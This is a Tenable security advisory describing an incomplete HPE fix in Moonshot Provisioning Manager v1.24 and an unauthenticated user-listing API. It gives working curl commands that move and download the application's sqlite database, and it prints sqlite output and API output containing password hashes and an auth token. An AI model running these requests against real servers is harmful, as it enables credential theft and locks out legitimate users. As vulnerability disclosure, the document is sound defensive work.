Synopsis
While developing a Nessus plugin for CVE-2018-7072 and CVE-2018-7073, Tenable discovered that the fix in HPE Moonshot Provisioning Manager v1.24 for HPE advisory HPESBHF03843 is incomplete. In v1.24, /opt/hp/moonshot/upload/ and many other directories are still writable by the user moonshot:
#find / -maxdepth 5 -type d -user moonshot -perm /u+w -printf "%M %u %p \n" 2> /dev/null drwx------ moonshot /home/moonshot drwxr-xr-x moonshot /var/lib/moonshot drwxr-xr-x moonshot /opt/hp/moonshot drwxr-xr-x moonshot /opt/hp/moonshot/include drwxr-xr-x moonshot /opt/hp/moonshot/repo drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/switch_mgr drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/prov_mgr drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/tinkerbell drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/moonshot_mgr drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/task_mgr drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/upgrade drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/root drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/os_mgr drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/user_mgr drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/pydeps drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/conf drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/tclient drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/bin drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/answers drwxr-xr-x moonshot /opt/hp/moonshot/upload drwxr-xr-x moonshot /opt/hp/moonshot/logs drwxr-xr-x moonshot /opt/hp/moonshot/bin drwxr-xr-x moonshot /opt/hp/moonshot/bin/__pycache__ drwxr-xr-x moonshot /opt/hp/moonshot/lib drwxr-xr-x moonshot /opt/hp/moonshot/lib/python3.3
For example, the attacker can move the db.sqlite3 file in /var/lib/moonshot to /opt/hp/moonshot/upload/:
$ curl -kd "isofile.savepath=/var/lib/moonshot/db.sqlite3&isofile.filename=db.sqlite3" https://<mpm_host>/cgi-bin/khuploadfile.cgi <html> <body> <p> File Upload Success <p> </body> </html>
Then the attacker can fetch the db.sqlite3 file with:
$ curl -k -o db.sqlite3 'https://<mpm_host>/upload/db.sqlite3'
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 95232 100 95232 0 0 294k 0 --:--:-- --:--:-- --:--:-- 567k
The db.sqlite3 file is the database for the 'tinkerbell' Django project and contains various information about the web application at https://<mpm_host>/. For example, it contains information about configured users and authentication tokens of logged in users:
$ sqlite3 db.sqlite3 SQLite version 3.6.20 Enter ".help" for instructions Enter SQL statements terminated with a ";" sqlite> .table auth_group moonshot_mgr_addressrecord auth_group_permissions moonshot_mgr_chassis auth_permission moonshot_mgr_chassisauthtoken auth_user moonshot_mgr_nic auth_user_groups moonshot_mgr_node auth_user_user_permissions moonshot_mgr_switch authtoken_token os_mgr_configurationfile django_admin_log os_mgr_operatingsystem django_content_type os_mgr_update django_migrations prov_mgr_backup django_session prov_mgr_clone djkombu_message prov_mgr_install djkombu_queue task_mgr_vlanassignmentrecord sqlite> .header on sqlite> select * from auth_user; id|password|is_superuser|username|first_name|last_name|email|is_staff|is_active|date_joined|last_login 1|pbkdf2_sha256$20000$kTvcnCFdQyTE$gmAgQbL6t1YCbkw6qnl+sGg9qKkf8wSQdxC+fhR4fwI=|1|user1|user number 1|||1|1|2018-08-01 22:43:43.292870|2018-08-21 22:28:15.787135 2|pbkdf2_sha256$20000$V0bHk71d7xte$eWxIyHgo75gYMZAWUS07mUVezMtY6Ru8gFb8awJJBoc=|1|user2|user number 2|||1|1|2018-08-21 22:47:59.549245| sqlite> select * from authtoken_token; key|created|user_id e8419331029d8b4d24369cdab9a69b6d97bf3bf0|2018-08-21 22:27:23.451159|1
This information may help the attacker launch further attacks.
Also, because /var/lib/moonshot/db.sqlite3 is moved to /opt/hp/moonshot/upload/, valid users can no longer login to the web UI at https://<mpm_host>/.
Tenable also found another security issue with URL endpoint /api/users/, which allows an unauthenticated remote attacker to fetch all user accounts with sensitive information including password hashes:
$ curl -k 'https://<mpm_host>/api/users/'
[{"url":"https:/<mpm_host>/</api/users/1/","username":"user1","first_name":"user number 1","password":"pbkdf2_sha256$20000$kTvcnCFdQyTE$gmAgQbL6t1YCbkw6qnl+sGg9qKkf8wSQdxC+fhR4fwI=","email":"","is_staff":true,"is_active":true,"is_superuser":true,"last_login":"2018-08-21T22:28:15.787135Z","date_joined":"2018-08-01T22:43:43.292870Z"},{"url":"https:///api/users/2/","username":"user2","first_name":"user number 2","password":"pbkdf2_sha256$20000$V0bHk71d7xte$eWxIyHgo75gYMZAWUS07mUVezMtY6Ru8gFb8awJJBoc=","email":"","is_staff":true,"is_active":true,"is_superuser":true,"last_login":null,"date_joined":"2018-08-21T22:47:59.549245Z"}]
Solution
No solution exists. Contact HPE for further instructions.Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]
Contact our sales team